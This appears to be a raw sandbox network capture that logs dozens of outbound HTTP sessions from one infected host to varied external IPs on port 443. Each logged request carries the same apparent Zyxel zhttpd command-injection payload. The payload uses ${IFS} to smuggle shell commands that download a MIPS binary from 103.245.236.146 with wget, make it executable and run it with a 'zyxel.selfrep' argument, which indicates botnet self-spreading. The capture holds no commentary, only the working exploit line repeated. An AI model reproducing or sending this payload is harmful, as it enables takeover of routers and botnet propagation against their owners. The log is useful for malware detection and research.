                                                        Jan 28, 2024 10:12:44.242014885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2288192.168.2.144741834.245.51.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242047071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2289192.168.2.145661060.241.38.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242090940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2290192.168.2.1441634113.36.168.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242121935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2291192.168.2.1434560205.110.198.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242181063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2292192.168.2.143887263.179.240.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242217064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2293192.168.2.1452816118.254.50.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242278099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2294192.168.2.143646036.184.191.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242317915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2295192.168.2.145707850.181.111.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242348909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2296192.168.2.1450114157.148.124.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242388964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2297192.168.2.143563477.201.19.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242429972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2298192.168.2.1447056179.105.28.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242450953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2299192.168.2.144598265.52.40.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242490053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2300192.168.2.145265657.199.175.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242564917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2301192.168.2.14394961.149.54.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242567062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2302192.168.2.1452878148.191.227.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242608070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2303192.168.2.1448714113.234.246.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242616892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2304192.168.2.144181819.47.99.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242671967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2305192.168.2.1441964139.250.236.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242712021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2306192.168.2.1459262143.0.123.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242748976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2307192.168.2.1439564181.130.230.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242798090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2308192.168.2.1460044130.182.102.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242847919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2309192.168.2.1433642152.30.192.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242889881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2310192.168.2.1457982166.195.92.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242928982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2311192.168.2.1451970202.111.50.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.242978096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2312192.168.2.144137694.76.30.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243014097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2313192.168.2.1449148160.240.186.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243050098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2314192.168.2.1443148146.141.12.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243069887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2315192.168.2.145520838.67.246.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243119001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2316192.168.2.1433702143.221.125.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243148088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2317192.168.2.1442296218.157.120.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243184090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2318192.168.2.1445170137.116.196.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243213892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2319192.168.2.1433966198.161.108.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243252039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2320192.168.2.145144058.177.216.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243294954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2321192.168.2.1456448111.90.100.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243338108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2322192.168.2.145212658.78.128.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243385077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2323192.168.2.143380012.37.156.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243427038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2324192.168.2.1453340165.227.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243477106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2325192.168.2.145795664.227.125.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243509054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2326192.168.2.1457476106.98.120.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243556023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2327192.168.2.1443562196.58.82.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243594885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2328192.168.2.1442948201.195.20.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243623972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2329192.168.2.143558876.116.95.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243675947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2330192.168.2.1455848107.208.70.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243702888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2331192.168.2.144486272.211.210.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243736982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2332192.168.2.14378062.127.2.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243774891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2333192.168.2.1455270157.134.132.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243823051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2334192.168.2.1432910160.196.175.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243851900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2335192.168.2.1454422184.162.176.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243902922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2336192.168.2.144107849.125.150.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243946075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2337192.168.2.1455328117.157.80.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.243959904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2338192.168.2.1448248182.107.111.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244009972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2339192.168.2.1437294167.70.208.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244044065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2340192.168.2.1457938111.11.106.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244081020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2341192.168.2.145341881.194.97.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244121075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2342192.168.2.14521009.63.116.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244159937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2343192.168.2.1443186222.139.12.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244198084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2344192.168.2.1439844154.67.87.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244245052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2345192.168.2.1443852169.43.45.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244270086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2346192.168.2.145955640.117.148.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244301081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2347192.168.2.1445500207.199.39.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.244332075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2348192.168.2.145340025.122.246.143443
                                                        TimestampBytes transferredDirectionData
